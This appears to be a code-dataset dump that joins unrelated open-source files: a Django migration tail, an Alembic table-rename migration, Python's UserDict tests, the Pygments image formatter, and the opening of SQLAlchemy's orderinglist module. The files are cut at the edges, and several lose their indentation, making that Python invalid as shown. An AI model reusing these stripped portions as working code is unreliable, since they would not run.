field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='collection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='collectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='credential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='credential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='export',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='export_format',
field=models.CharField(choices=[('xlsx', 'Excel (XLSX)'), ('csv', 'Comma separated values (CSV)'), ('tsv', 'Tab separated values (TSV)'), ('json_full', 'Full JSON'), ('json', 'JSON of limited fields'), ('dehydrate', 'Text file of identifiers (dehydrate)')], default='xlsx', max_length=10),
),
migrations.AlterField(
model_name='export',
name='export_segment_size',
            field=models.BigIntegerField(blank=True, choices=[(100000, '100,000'), (250000, '250,000'), (500000, '500,000'), (1000000, '1,000,000'), (None, 'Single file'), (100, '100')], default=250000, null=True),
),
migrations.AlterField(
model_name='export',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='status',
field=models.CharField(choices=[('not requested', 'Not requested'), ('requested', 'Requested'), ('running', 'Running'), ('completed success', 'Success'), ('completed failure', 'Failure')], default='not requested', max_length=20),
),
migrations.AlterField(
model_name='export',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='status',
field=models.CharField(choices=[('requested', 'Requested'), ('completed success', 'Success'), ('completed failure', 'Completed with errors'), ('running', 'Running'), ('stop requested', 'Stop requested'), ('stopping', 'Stopping'), ('voided', 'Voided'), ('skipped', 'Skipped'), ('paused', 'Paused')], default='requested', max_length=20),
),
migrations.AlterField(
model_name='harvest',
name='token_updates',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='uids',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='historicalcollection',
name='end_date',
field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='historicalcollection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='historicalcollection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='historicalcollection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='historicalcollection',
name='schedule_minutes',
field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='historicalcollection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='historicalcollectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='user',
name='email_frequency',
field=models.CharField(choices=[('daily', 'Daily'), ('weekly', 'Weekly'), ('monthly', 'Monthly'), ('none', 'None')], default='daily', max_length=10),
),
migrations.AlterField(
model_name='user',
name='last_name',
field=models.CharField(blank=True, max_length=150, verbose_name='last name'),
),
migrations.AlterField(
model_name='user',
name='local_id',
field=models.CharField(blank=True, default='', help_text='Local identifier', max_length=255),
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username'),
),
]
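# Applying this migration follows the standard Django workflow (command
# shown is the usual invocation; a configured settings module is assumed):
#   python manage.py migrate ui 0021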
| mit |
City-of-Helsinki/kuulemma | kuulemma/migrations/versions/14051cff79e_rename_hearing_section_to_alternative.py | 2 | 4084 | # -*- coding: utf-8 -*-
# Kuulemma
# Copyright (C) 2014, Fast Monkeys Oy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Rename `hearing_section` to `alternative`"""
# revision identifiers, used by Alembic.
revision = '14051cff79e'
down_revision = '51051f5b195'
from alembic import op
def upgrade():
op.rename_table('hearing_section', 'alternative')
op.rename_table('hearing_section_version', 'alternative_version')
op.alter_column(
'comment',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'image',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'comment_version',
'hearing_section_id',
new_column_name='alternative_id'
)
op.create_index(op.f(
'ix_alternative_version_end_transaction_id'),
'alternative_version',
['end_transaction_id'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_operation_type'),
'alternative_version',
['operation_type'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_transaction_id'),
'alternative_version',
['transaction_id'],
unique=False
)
op.drop_index(
'ix_hearing_section_version_end_transaction_id',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_operation_type',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_transaction_id',
table_name='alternative_version'
)
op.create_index(
op.f('ix_image_alternative_id'),
'image',
['alternative_id'],
unique=False
)
op.drop_index(
'ix_image_hearing_section_id',
table_name='image'
)
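# Typical Alembic invocations for this revision (standard CLI; assumes a
# configured alembic.ini):
#   alembic upgrade 14051cff79e      # apply the rename
#   alembic downgrade 51051f5b195    # revert to the previous revision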
def downgrade():
op.drop_index(
op.f('ix_image_alternative_id'),
table_name='image'
)
op.drop_index(
op.f('ix_alternative_version_transaction_id'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_operation_type'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_end_transaction_id'),
table_name='alternative_version'
)
op.rename_table('alternative', 'hearing_section')
op.rename_table('alternative_version', 'hearing_section_version')
op.alter_column(
'comment',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'image',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'comment_version',
'alternative_id',
new_column_name='hearing_section_id'
)
op.create_index(
'ix_image_hearing_section_id',
'image',
['hearing_section_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_transaction_id',
'hearing_section_version',
['transaction_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_operation_type',
'hearing_section_version',
['operation_type'],
unique=False
)
op.create_index(
'ix_hearing_section_version_end_transaction_id',
'hearing_section_version',
['end_transaction_id'],
unique=False
)
| agpl-3.0 |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_userdict.py | 2 | 6470 | # Check every path through every method of UserDict
from test import support, mapping_tests
import collections
d0 = {}
d1 = {"one": 1}
d2 = {"one": 1, "two": 2}
d3 = {"one": 1, "two": 3, "three": 5}
d4 = {"one": None, "two": None}
d5 = {"one": 1, "two": 1}
class UserDictTest(mapping_tests.TestHashMappingProtocol):
type2test = collections.UserDict
def test_all(self):
# Test constructors
u = collections.UserDict()
u0 = collections.UserDict(d0)
u1 = collections.UserDict(d1)
u2 = collections.UserDict(d2)
uu = collections.UserDict(u)
uu0 = collections.UserDict(u0)
uu1 = collections.UserDict(u1)
uu2 = collections.UserDict(u2)
# keyword arg constructor
self.assertEqual(collections.UserDict(one=1, two=2), d2)
# item sequence constructor
self.assertEqual(collections.UserDict([('one',1), ('two',2)]), d2)
self.assertEqual(collections.UserDict(dict=[('one',1), ('two',2)]), d2)
# both together
self.assertEqual(collections.UserDict([('one',1), ('two',2)], two=3, three=5), d3)
# alternate constructor
self.assertEqual(collections.UserDict.fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict().fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict.fromkeys('one two'.split(), 1), d5)
self.assertEqual(collections.UserDict().fromkeys('one two'.split(), 1), d5)
self.assert_(u1.fromkeys('one two'.split()) is not u1)
self.assert_(isinstance(u1.fromkeys('one two'.split()), collections.UserDict))
self.assert_(isinstance(u2.fromkeys('one two'.split()), collections.UserDict))
# Test __repr__
self.assertEqual(str(u0), str(d0))
self.assertEqual(repr(u1), repr(d1))
self.assertEqual(repr(u2), repr(d2))
# Test __cmp__ and __len__
all = [d0, d1, d2, u, u0, u1, u2, uu, uu0, uu1, uu2]
for a in all:
for b in all:
self.assertEqual(a == b, len(a) == len(b))
# Test __getitem__
self.assertEqual(u2["one"], 1)
self.assertRaises(KeyError, u1.__getitem__, "two")
# Test __setitem__
u3 = collections.UserDict(u2)
u3["two"] = 2
u3["three"] = 3
# Test __delitem__
del u3["three"]
self.assertRaises(KeyError, u3.__delitem__, "three")
# Test clear
u3.clear()
self.assertEqual(u3, {})
# Test copy()
u2a = u2.copy()
self.assertEqual(u2a, u2)
u2b = collections.UserDict(x=42, y=23)
u2c = u2b.copy() # making a copy of a UserDict is special cased
self.assertEqual(u2b, u2c)
class MyUserDict(collections.UserDict):
def display(self): print(self)
m2 = MyUserDict(u2)
m2a = m2.copy()
self.assertEqual(m2a, m2)
# SF bug #476616 -- copy() of UserDict subclass shared data
m2['foo'] = 'bar'
self.assertNotEqual(m2a, m2)
# Test keys, items, values
self.assertEqual(u2.keys(), d2.keys())
self.assertEqual(u2.items(), d2.items())
self.assertEqual(list(u2.values()), list(d2.values()))
# Test "in".
for i in u2.keys():
self.assert_(i in u2)
self.assertEqual(i in u1, i in d1)
self.assertEqual(i in u0, i in d0)
# Test update
t = collections.UserDict()
t.update(u2)
self.assertEqual(t, u2)
# Test get
for i in u2.keys():
self.assertEqual(u2.get(i), u2[i])
self.assertEqual(u1.get(i), d1.get(i))
self.assertEqual(u0.get(i), d0.get(i))
# Test "in" iteration.
for i in range(20):
u2[i] = str(i)
ikeys = []
for k in u2:
ikeys.append(k)
keys = u2.keys()
self.assertEqual(set(ikeys), set(keys))
# Test setdefault
t = collections.UserDict()
self.assertEqual(t.setdefault("x", 42), 42)
self.assert_("x" in t)
self.assertEqual(t.setdefault("x", 23), 42)
# Test pop
t = collections.UserDict(x=42)
self.assertEqual(t.pop("x"), 42)
self.assertRaises(KeyError, t.pop, "x")
self.assertEqual(t.pop("x", 1), 1)
t["x"] = 42
self.assertEqual(t.pop("x", 1), 42)
# Test popitem
t = collections.UserDict(x=42)
self.assertEqual(t.popitem(), ("x", 42))
self.assertRaises(KeyError, t.popitem)
def test_missing(self):
# Make sure UserDict doesn't have a __missing__ method
self.assertEqual(hasattr(collections.UserDict, "__missing__"), False)
# Test several cases:
# (D) subclass defines __missing__ method returning a value
# (E) subclass defines __missing__ method raising RuntimeError
# (F) subclass sets __missing__ instance variable (no effect)
        # (G) subclass doesn't define __missing__ at all
class D(collections.UserDict):
def __missing__(self, key):
return 42
d = D({1: 2, 3: 4})
self.assertEqual(d[1], 2)
self.assertEqual(d[3], 4)
self.assert_(2 not in d)
self.assert_(2 not in d.keys())
self.assertEqual(d[2], 42)
class E(collections.UserDict):
def __missing__(self, key):
raise RuntimeError(key)
e = E()
try:
e[42]
except RuntimeError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("e[42] didn't raise RuntimeError")
class F(collections.UserDict):
def __init__(self):
# An instance variable __missing__ should have no effect
self.__missing__ = lambda key: None
collections.UserDict.__init__(self)
f = F()
try:
f[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("f[42] didn't raise KeyError")
class G(collections.UserDict):
pass
g = G()
try:
g[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("g[42] didn't raise KeyError")
def test_main():
support.run_unittest(
UserDictTest,
)
if __name__ == "__main__":
test_main()
| mit |
PatKayongo/patkayongo.github.io | node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/formatters/img.py | 94 | 18053 | # -*- coding: utf-8 -*-
"""
pygments.formatters.img
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for Pixmap output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt, \
get_list_opt, get_choice_opt
# Import this carefully
try:
from PIL import Image, ImageDraw, ImageFont
pil_available = True
except ImportError:
pil_available = False
try:
import winreg
except ImportError:
    winreg = None
__all__ = ['ImageFormatter', 'GifImageFormatter', 'JpgImageFormatter',
'BmpImageFormatter']
# For some unknown reason every font calls it something different
STYLES = {
'NORMAL': ['', 'Roman', 'Book', 'Normal', 'Regular', 'Medium'],
'ITALIC': ['Oblique', 'Italic'],
'BOLD': ['Bold'],
'BOLDITALIC': ['Bold Oblique', 'Bold Italic'],
}
# A sane default for modern systems
DEFAULT_FONT_NAME_NIX = 'Bitstream Vera Sans Mono'
DEFAULT_FONT_NAME_WIN = 'Courier New'
class PilNotAvailable(ImportError):
"""When Python imaging library is not available"""
class FontNotFound(Exception):
"""When there are no usable fonts specified"""
class FontManager(object):
"""
Manages a set of fonts: normal, italic, bold, etc...
"""
def __init__(self, font_name, font_size=14):
self.font_name = font_name
self.font_size = font_size
self.fonts = {}
self.encoding = None
if sys.platform.startswith('win'):
if not font_name:
self.font_name = DEFAULT_FONT_NAME_WIN
self._create_win()
else:
if not font_name:
self.font_name = DEFAULT_FONT_NAME_NIX
self._create_nix()
def _get_nix_font_path(self, name, style):
from subprocess import getstatusoutput
exit, out = getstatusoutput('fc-list "%s:style=%s" file' %
(name, style))
if not exit:
lines = out.splitlines()
if lines:
path = lines[0].strip().strip(':')
return path
def _create_nix(self):
for name in STYLES['NORMAL']:
path = self._get_nix_font_path(self.font_name, name)
if path is not None:
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
break
else:
raise FontNotFound('No usable fonts named: "%s"' %
self.font_name)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
for stylename in STYLES[style]:
path = self._get_nix_font_path(self.font_name, stylename)
if path is not None:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
break
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
def _lookup_win(self, key, basename, styles, fail=False):
for suffix in ('', ' (TrueType)'):
for style in styles:
try:
valname = '%s%s%s' % (basename, style and ' '+style, suffix)
val, _ = winreg.QueryValueEx(key, valname)
return val
except EnvironmentError:
continue
else:
if fail:
raise FontNotFound('Font %s (%s) not found in registry' %
(basename, styles[0]))
return None
def _create_win(self):
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows NT\CurrentVersion\Fonts')
except EnvironmentError:
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows\CurrentVersion\Fonts')
except EnvironmentError:
raise FontNotFound('Can\'t open Windows font registry key')
try:
path = self._lookup_win(key, self.font_name, STYLES['NORMAL'], True)
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
path = self._lookup_win(key, self.font_name, STYLES[style])
if path:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
finally:
winreg.CloseKey(key)
def get_char_size(self):
"""
Get the character size.
"""
return self.fonts['NORMAL'].getsize('M')
def get_font(self, bold, oblique):
"""
Get the font based on bold and italic flags.
"""
if bold and oblique:
return self.fonts['BOLDITALIC']
elif bold:
return self.fonts['BOLD']
elif oblique:
return self.fonts['ITALIC']
else:
return self.fonts['NORMAL']
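# A minimal FontManager sketch (illustrative; which fonts resolve depends on
# the host system):
#   fm = FontManager('Bitstream Vera Sans Mono', 14)
#   char_width, char_height = fm.get_char_size()
#   bold_italic = fm.get_font(bold=True, oblique=True)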
class ImageFormatter(Formatter):
"""
Create a PNG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 0.10.*
Additional options accepted:
`image_format`
An image format to output to that is recognised by PIL, these include:
* "PNG" (default)
* "JPEG"
* "BMP"
* "GIF"
`line_pad`
The extra spacing (in pixels) between each line of text.
Default: 2
`font_name`
The font name to be used as the base font from which others, such as
bold and italic fonts will be generated. This really should be a
monospace font to look sane.
Default: "Bitstream Vera Sans Mono"
`font_size`
The font size in points to be used.
Default: 14
`image_pad`
The padding, in pixels to be used at each edge of the resulting image.
Default: 10
`line_numbers`
Whether line numbers should be shown: True/False
Default: True
`line_number_start`
The line number of the first line.
Default: 1
`line_number_step`
The step used when printing line numbers.
Default: 1
`line_number_bg`
The background colour (in "#123456" format) of the line number bar, or
None to use the style background color.
Default: "#eed"
`line_number_fg`
The text color of the line numbers (in "#123456"-like format).
Default: "#886"
`line_number_chars`
The number of columns of line numbers allowable in the line number
margin.
Default: 2
`line_number_bold`
Whether line numbers will be bold: True/False
Default: False
`line_number_italic`
Whether line numbers will be italicized: True/False
Default: False
`line_number_separator`
Whether a line will be drawn between the line number area and the
source code area: True/False
Default: True
`line_number_pad`
The horizontal padding (in pixels) between the line number margin, and
the source code area.
Default: 6
`hl_lines`
Specify a list of lines to be highlighted. *New in Pygments 1.2.*
Default: empty list
`hl_color`
Specify the color for highlighting lines. *New in Pygments 1.2.*
Default: highlight color of the selected style
"""
# Required by the pygments mapper
name = 'img'
aliases = ['img', 'IMG', 'png']
filenames = ['*.png']
unicodeoutput = False
default_image_format = 'png'
def __init__(self, **options):
"""
See the class docstring for explanation of options.
"""
if not pil_available:
raise PilNotAvailable(
'Python Imaging Library is required for this formatter')
Formatter.__init__(self, **options)
# Read the style
self.styles = dict(self.style)
if self.style.background_color is None:
self.background_color = '#fff'
else:
self.background_color = self.style.background_color
# Image options
self.image_format = get_choice_opt(
options, 'image_format', ['png', 'jpeg', 'gif', 'bmp'],
self.default_image_format, normcase=True)
self.image_pad = get_int_opt(options, 'image_pad', 10)
self.line_pad = get_int_opt(options, 'line_pad', 2)
# The fonts
fontsize = get_int_opt(options, 'font_size', 14)
self.fonts = FontManager(options.get('font_name', ''), fontsize)
self.fontw, self.fonth = self.fonts.get_char_size()
# Line number options
self.line_number_fg = options.get('line_number_fg', '#886')
self.line_number_bg = options.get('line_number_bg', '#eed')
self.line_number_chars = get_int_opt(options,
'line_number_chars', 2)
self.line_number_bold = get_bool_opt(options,
'line_number_bold', False)
self.line_number_italic = get_bool_opt(options,
'line_number_italic', False)
self.line_number_pad = get_int_opt(options, 'line_number_pad', 6)
self.line_numbers = get_bool_opt(options, 'line_numbers', True)
self.line_number_separator = get_bool_opt(options,
'line_number_separator', True)
self.line_number_step = get_int_opt(options, 'line_number_step', 1)
self.line_number_start = get_int_opt(options, 'line_number_start', 1)
if self.line_numbers:
self.line_number_width = (self.fontw * self.line_number_chars +
self.line_number_pad * 2)
else:
self.line_number_width = 0
self.hl_lines = []
hl_lines_str = get_list_opt(options, 'hl_lines', [])
for line in hl_lines_str:
try:
self.hl_lines.append(int(line))
except ValueError:
pass
self.hl_color = options.get('hl_color',
self.style.highlight_color) or '#f90'
self.drawables = []
def get_style_defs(self, arg=''):
raise NotImplementedError('The -S option is meaningless for the image '
'formatter. Use -O style=<stylename> instead.')
def _get_line_height(self):
"""
Get the height of a line.
"""
return self.fonth + self.line_pad
def _get_line_y(self, lineno):
"""
Get the Y coordinate of a line number.
"""
return lineno * self._get_line_height() + self.image_pad
def _get_char_width(self):
"""
Get the width of a character.
"""
return self.fontw
def _get_char_x(self, charno):
"""
Get the X coordinate of a character position.
"""
return charno * self.fontw + self.image_pad + self.line_number_width
def _get_text_pos(self, charno, lineno):
"""
Get the actual position for a character and line position.
"""
return self._get_char_x(charno), self._get_line_y(lineno)
def _get_linenumber_pos(self, lineno):
"""
Get the actual position for the start of a line number.
"""
return (self.image_pad, self._get_line_y(lineno))
def _get_text_color(self, style):
"""
Get the correct color for the token from the style.
"""
if style['color'] is not None:
fill = '#' + style['color']
else:
fill = '#000'
return fill
def _get_style_font(self, style):
"""
Get the correct font for the style.
"""
return self.fonts.get_font(style['bold'], style['italic'])
def _get_image_size(self, maxcharno, maxlineno):
"""
Get the required image size.
"""
return (self._get_char_x(maxcharno) + self.image_pad,
self._get_line_y(maxlineno + 0) + self.image_pad)
def _draw_linenumber(self, posno, lineno):
"""
Remember a line number drawable to paint later.
"""
self._draw_text(
self._get_linenumber_pos(posno),
str(lineno).rjust(self.line_number_chars),
font=self.fonts.get_font(self.line_number_bold,
self.line_number_italic),
fill=self.line_number_fg,
)
def _draw_text(self, pos, text, font, **kw):
"""
Remember a single drawable tuple to paint later.
"""
self.drawables.append((pos, text, font, kw))
def _create_drawables(self, tokensource):
"""
Create drawables for the token content.
"""
lineno = charno = maxcharno = 0
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
style = self.styles[ttype]
# TODO: make sure tab expansion happens earlier in the chain. It
# really ought to be done on the input, as to do it right here is
# quite complex.
value = value.expandtabs(4)
lines = value.splitlines(True)
#print lines
for i, line in enumerate(lines):
temp = line.rstrip('\n')
if temp:
self._draw_text(
self._get_text_pos(charno, lineno),
temp,
font = self._get_style_font(style),
fill = self._get_text_color(style)
)
charno += len(temp)
maxcharno = max(maxcharno, charno)
if line.endswith('\n'):
# add a line for each extra line in the value
charno = 0
lineno += 1
self.maxcharno = maxcharno
self.maxlineno = lineno
def _draw_line_numbers(self):
"""
Create drawables for the line numbers.
"""
if not self.line_numbers:
return
for p in range(self.maxlineno):
n = p + self.line_number_start
if (n % self.line_number_step) == 0:
self._draw_linenumber(p, n)
def _paint_line_number_bg(self, im):
"""
Paint the line number background on the image.
"""
if not self.line_numbers:
return
if self.line_number_fg is None:
return
draw = ImageDraw.Draw(im)
recth = im.size[-1]
rectw = self.image_pad + self.line_number_width - self.line_number_pad
draw.rectangle([(0, 0),
(rectw, recth)],
fill=self.line_number_bg)
draw.line([(rectw, 0), (rectw, recth)], fill=self.line_number_fg)
del draw
def format(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
This implementation calculates where it should draw each token on the
pixmap, then calculates the required pixmap size and draws the items.
"""
self._create_drawables(tokensource)
self._draw_line_numbers()
im = Image.new(
'RGB',
self._get_image_size(self.maxcharno, self.maxlineno),
self.background_color
)
self._paint_line_number_bg(im)
draw = ImageDraw.Draw(im)
# Highlight
if self.hl_lines:
x = self.image_pad + self.line_number_width - self.line_number_pad + 1
recth = self._get_line_height()
rectw = im.size[0] - x
for linenumber in self.hl_lines:
y = self._get_line_y(linenumber - 1)
draw.rectangle([(x, y), (x + rectw, y + recth)],
fill=self.hl_color)
for pos, value, font, kw in self.drawables:
draw.text(pos, value, font=font, **kw)
im.save(outfile, self.image_format.upper())
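# A minimal end-to-end sketch (illustrative; `code` is assumed to hold the
# source text to render):
#   from pygments import highlight
#   from pygments.lexers import PythonLexer
#   with open('out.png', 'wb') as f:
#       highlight(code, PythonLexer(), ImageFormatter(font_size=14), f)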
# Add one formatter per format, so that the "-f gif" option gives the correct result
# when used in pygmentize.
class GifImageFormatter(ImageFormatter):
"""
Create a GIF image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create GIF images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_gif'
aliases = ['gif']
filenames = ['*.gif']
default_image_format = 'gif'
class JpgImageFormatter(ImageFormatter):
"""
Create a JPEG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create JPEG images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_jpg'
aliases = ['jpg', 'jpeg']
filenames = ['*.jpg']
default_image_format = 'jpeg'
class BmpImageFormatter(ImageFormatter):
"""
Create a bitmap image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create bitmap images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_bmp'
aliases = ['bmp', 'bitmap']
filenames = ['*.bmp']
default_image_format = 'bmp'
| mit |
sqlalchemy/sqlalchemy | lib/sqlalchemy/ext/orderinglist.py | 3 | 13875 | # ext/orderinglist.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""A custom list that manages index/position information for contained
elements.
:author: Jason Kirtland
``orderinglist`` is a helper for mutable ordered relationships. It will
intercept list operations performed on a :func:`_orm.relationship`-managed
collection and
automatically synchronize changes in list position onto a target scalar
attribute.
Example: A ``slide`` table, where each row refers to zero or more entries
in a related ``bullet`` table. The bullets within a slide are
displayed in order based on the value of the ``position`` column in the
``bullet`` table. As entries are reordered in memory, the value of the
``position`` attribute should be updated to reflect the new sort order::
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position")
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
The standard relationship mapping will produce a list-like attribute on each
``Slide`` containing all related ``Bullet`` objects,
but coping with changes in ordering is not handled automatically.
When appending a ``Bullet`` into ``Slide.bullets``, the ``Bullet.position``
attribute will remain unset until manually assigned. When the ``Bullet``
is inserted into the middle of the list, the following ``Bullet`` objects
will also need to be renumbered.
The :class:`.OrderingList` object automates this task, managing the
``position`` attribute on all ``Bullet`` objects in the collection. It is
constructed using the :func:`.ordering_list` factory::
from sqlalchemy.ext.orderinglist import ordering_list
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
With the above mapping the ``Bullet.position`` attribute is managed::
s = Slide()
s.bullets.append(Bullet())
s.bullets.append(Bullet())
s.bullets[1].position
>>> 1
s.bullets.insert(1, Bullet())
s.bullets[2].position
>>> 2
The :class:`.OrderingList` construct only works with **changes** to a
collection, and not the initial load from the database, and requires that the
list be sorted when loaded. Therefore, be sure to specify ``order_by`` on the
:func:`_orm.relationship` against the target ordering attribute, so that the
ordering is correct when first loaded.
.. warning::
:class:`.OrderingList` only provides limited functionality when a primary
key column or unique column is the target of the sort. Operations
that are unsupported or are problematic include:
* two entries must trade values. This is not supported directly in the
case of a primary key or unique constraint because it means at least
one row would need to be temporarily removed first, or changed to
a third, neutral value while the switch occurs.
* an entry must be deleted in order to make room for a new entry.
SQLAlchemy's unit of work performs all INSERTs before DELETEs within a
single flush. In the case of a primary key, it will trade
an INSERT/DELETE of the same primary key for an UPDATE statement in order
to lessen the impact of this limitation, however this does not take place
for a UNIQUE column.
A future feature will allow the "DELETE before INSERT" behavior to be
possible, alleviating this limitation, though this feature will require
explicit configuration at the mapper level for sets of columns that
are to be handled in this way.
:func:`.ordering_list` takes the name of the related object's ordering
attribute as an argument. By default, the zero-based integer index of the
object's position in the :func:`.ordering_list` is synchronized with the
ordering attribute: index 0 will get position 0, index 1 position 1, etc. To
start numbering at 1 or some other integer, provide ``count_from=1``.
"""
from ..orm.collections import collection
from ..orm.collections import collection_adapter
__all__ = ["ordering_list"]
def ordering_list(attr, count_from=None, **kw):
"""Prepares an :class:`OrderingList` factory for use in mapper definitions.
Returns an object suitable for use as an argument to a Mapper
relationship's ``collection_class`` option. e.g.::
